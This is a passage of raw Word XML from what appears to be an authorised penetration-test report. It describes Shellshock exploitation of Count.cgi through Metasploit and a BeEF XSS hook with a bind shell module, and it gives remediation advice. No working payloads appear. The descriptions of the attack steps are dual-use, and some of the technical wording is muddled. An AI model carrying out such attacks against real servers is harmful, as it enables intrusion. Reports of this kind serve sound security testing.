          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A5D4E23" wp14:editId="57CC8035">
            <wp:extent cx="5731510" cy="36449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644900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE75C4" w14:textId="6D8E4A6B" w:rsidR="003571F7" w:rsidRPr="00B4415C" w:rsidRDefault="00B4415C" w:rsidP="00B4415C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc40134081"/>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Metasploit Framework Utilised to Exploit Shellshock Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="302A842F" w14:textId="6A1DDC82" w:rsidR="003571F7" w:rsidRDefault="003571F7" w:rsidP="003571F7"/>
    <w:p w14:paraId="16A1547A" w14:textId="7CD27FC7" w:rsidR="003571F7" w:rsidRPr="003571F7" w:rsidRDefault="003571F7" w:rsidP="003571F7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4415C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00B4415C" w:rsidRPr="00B4415C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates the exploit was successful within connecting using port 587 and  </w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t xml:space="preserve">attempting to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inject the malicious code against the vulnerable webserver. </w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t>However, t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he exploit was prematurely exited before a backdoor was uploaded to prevent malware being injected into the target webserver to create a persistent backdoor. This attack was only leveraged as proof of concept per the clients </w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t>instructions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> not inject malware or create persistent backdoors on the companies live webserver.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A39BF1" w14:textId="13ACF4B9" w:rsidR="007A182B" w:rsidRDefault="007A182B" w:rsidP="007A182B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc40134055"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00BA78EF">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="128F6CE4" w14:textId="64118ECF" w:rsidR="00587262" w:rsidRPr="00587262" w:rsidRDefault="007A182B" w:rsidP="00587262">
      <w:r>
        <w:t xml:space="preserve">To secure this </w:t>
      </w:r>
      <w:r w:rsidR="00F2763B">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from attack the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file permissions need to be modified on the local server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilsiing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the bash syntax; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F2763B">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F2763B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F2763B">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F2763B">
        <w:t xml:space="preserve"> 400 /cig-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F2763B">
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F2763B">
        <w:t>] which modifies the file the permissions of the file to read only</w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t xml:space="preserve"> along with regularly updating and patching the</w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve"> Debian</w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve"> with the CLI BASH syntax: [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E305E">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve"> apt-get update &amp;&amp; apt-get upgrade]</w:t>
      </w:r>
      <w:r w:rsidR="00185D20">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7043E312" w14:textId="47D1F20C" w:rsidR="00DF665E" w:rsidRDefault="00587262" w:rsidP="000F467B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc40134056"/>
      <w:r>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00BA78EF">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Attack </w:t>
      </w:r>
      <w:r w:rsidR="00612AB0">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00E25137">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00533A34">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00E25137">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD2DA7">
        <w:t xml:space="preserve">Beef XSS </w:t>
      </w:r>
      <w:r w:rsidR="00F3422D">
        <w:t xml:space="preserve">Bind Shell </w:t>
      </w:r>
      <w:r w:rsidR="00CD2DA7">
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidR="000F467B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3FA45A" w14:textId="65BE1223" w:rsidR="00584892" w:rsidRDefault="00584892" w:rsidP="003E305E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Beef</w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve"> specialised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> website </w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t>exploitation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> framework was </w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t>utilsed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t xml:space="preserve"> identify and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t>exploit any XSS weaknesses previously undetected within the information gathering stage of the ‘Black-Box’ penetration test located within the target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E305E">
        <w:t>website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6598D942" w14:textId="50F475ED" w:rsidR="003E305E" w:rsidRPr="00584892" w:rsidRDefault="003E305E" w:rsidP="003E305E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Beef framework tool was initialised within the Bash CLI and exposed to the local loopback address of the attacking machine, where a web browser can be utilised to hook the target website and retrieve information and execute vulnerabilities via the GUI Beef interface shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="008E0749" w:rsidRPr="008E0749">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC3BA3" w14:textId="77777777" w:rsidR="008E0749" w:rsidRDefault="00DF665E" w:rsidP="008E0749">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="543742FF" wp14:editId="6122F0B7">
            <wp:extent cx="5728970" cy="3643630"/>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8970" cy="3643630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A989F" w14:textId="584131B8" w:rsidR="00A14943" w:rsidRPr="008E0749" w:rsidRDefault="008E0749" w:rsidP="008E0749">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc40134082"/>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Beef Webserver Installed on Attacker Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="47294C76" w14:textId="06ED5A47" w:rsidR="003E305E" w:rsidRDefault="003E305E" w:rsidP="001500AD">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the Beef tool was loaded, the security researcher navigated to the target website and applied the ‘Hook’ shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="008E0749">
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where the automated tool reported XSS </w:t>
      </w:r>
      <w:r w:rsidR="001500AD">
        <w:t>WordPress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS vulnerabilities within the target website</w:t>
      </w:r>
      <w:r w:rsidR="001500AD">
        <w:t xml:space="preserve"> directory /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001500AD">
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001500AD">
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001500AD">
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001500AD">
        <w:t xml:space="preserve"> with utilising the custom Beef XSS exploit ‘Beef Blind Shell’</w:t>
      </w:r>
      <w:r w:rsidR="004C28D9">
        <w:t>, an arbitury bash command ‘Hostname’ was utilised so that the exploit would not create a reverse shell or leverage a DOS against the website but respond if the vulnerability would have been successfully</w:t>
      </w:r>
      <w:r w:rsidR="008E0749">
        <w:t xml:space="preserve"> that is also</w:t>
      </w:r>
      <w:r w:rsidR="004C28D9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="001500AD">
        <w:t xml:space="preserve">illustrated within </w:t>
      </w:r>
      <w:r w:rsidR="001500AD" w:rsidRPr="008E0749">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="008E0749" w:rsidRPr="008E0749">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57514CE1" w14:textId="77777777" w:rsidR="001500AD" w:rsidRDefault="001500AD" w:rsidP="001500AD">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE5B99E" w14:textId="77777777" w:rsidR="008E0749" w:rsidRDefault="00DF665E" w:rsidP="008E0749">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C0C20D3" wp14:editId="6853FF3D">
            <wp:extent cx="5730240" cy="3642360"/>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p>
    <w:p w14:paraId="214A1676" w14:textId="01468193" w:rsidR="00312320" w:rsidRPr="008E0749" w:rsidRDefault="008E0749" w:rsidP="008E0749">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc40134083"/>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008E0749">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Beef Hook Utilised on Target Website Using the Beef Bind Shell Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="4C922ADC" w14:textId="59B1538D" w:rsidR="004C28D9" w:rsidRDefault="004C28D9" w:rsidP="00CD2DA7">
      <w:r>
        <w:t xml:space="preserve">Once successful a beef hook persistent session was created shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="001A4153">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is called a Zombie that is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A4153">
        <w:t>exited</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> when the attacker browser is closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E326D50" w14:textId="77777777" w:rsidR="001A4153" w:rsidRDefault="00F3422D" w:rsidP="001A4153">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E873718" wp14:editId="02A1D05C">
            <wp:extent cx="5729684" cy="1359568"/>
            <wp:effectExtent l="19050" t="19050" r="23495" b="1206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2">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="62670"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="1359700"/>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8519237" w14:textId="3E991207" w:rsidR="004C28D9" w:rsidRDefault="001A4153" w:rsidP="001A4153">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc40134084"/>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001A4153">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Target Website Hooked with Persistent Session Beef Zombie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="6209C77A" w14:textId="7877922A" w:rsidR="004C28D9" w:rsidRDefault="004C28D9" w:rsidP="00CD2DA7">
      <w:r>
        <w:t xml:space="preserve">The Beef logs within the attackers BASH CLI confirms that the XSS module would have been successful if leveraged with the correct command instructions to create a reverse TCP/IP shell to gain access to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>clients</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> webserver shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00B54611" w:rsidRPr="00B54611">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00B54611">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916E1F9" w14:textId="77777777" w:rsidR="00B54611" w:rsidRDefault="00F3422D" w:rsidP="00B54611">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4B5D50" wp14:editId="3F47A36C">
            <wp:extent cx="5730240" cy="364236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r w:rsidR="00A4183E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED11EFA" wp14:editId="65B242E3">
            <wp:extent cx="5730240" cy="3153076"/>
            <wp:effectExtent l="0" t="0" r="381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4">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="13433"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="3153076"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A60978" w14:textId="5256F089" w:rsidR="00CD2DA7" w:rsidRPr="00B54611" w:rsidRDefault="00B54611" w:rsidP="00B54611">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc40134085"/>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B54611">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Beef CLI Webserver logs Show Exploit was Successful</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="09A0C8CB" w14:textId="2C3257EF" w:rsidR="00DF665E" w:rsidRPr="00CD2DA7" w:rsidRDefault="004C28D9" w:rsidP="00471C33">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The status success shown within the above image indicates the XSS exploit module was a success but did not create a remote shell or execute any malicious code on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>clients</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE60C8" w14:textId="77519961" w:rsidR="00587262" w:rsidRDefault="00587262" w:rsidP="00587262">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc40134057"/>
      <w:r>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00BA78EF">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Security Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="085FF1BF" w14:textId="486AB450" w:rsidR="000E05DE" w:rsidRDefault="004C28D9" w:rsidP="00471C33">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security recommendations will be identical to the shellshock exploit that utilised the same vulnerability to attempt to create a backdoor within the target system utilising the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Count.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerability previously identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F33BE6" w14:textId="3E5C497C" w:rsidR="00EF6ABD" w:rsidRDefault="000E05DE" w:rsidP="00EF183F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc40134058"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidR="00612AB0">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Attack </w:t>
      </w:r>
      <w:r w:rsidR="00612AB0">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000F467B">
        <w:t>Heartbleed Exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="757BEBDE" w14:textId="54AADC69" w:rsidR="007F4CB3" w:rsidRDefault="004C28D9" w:rsidP="007F4CB3">
      <w:r>
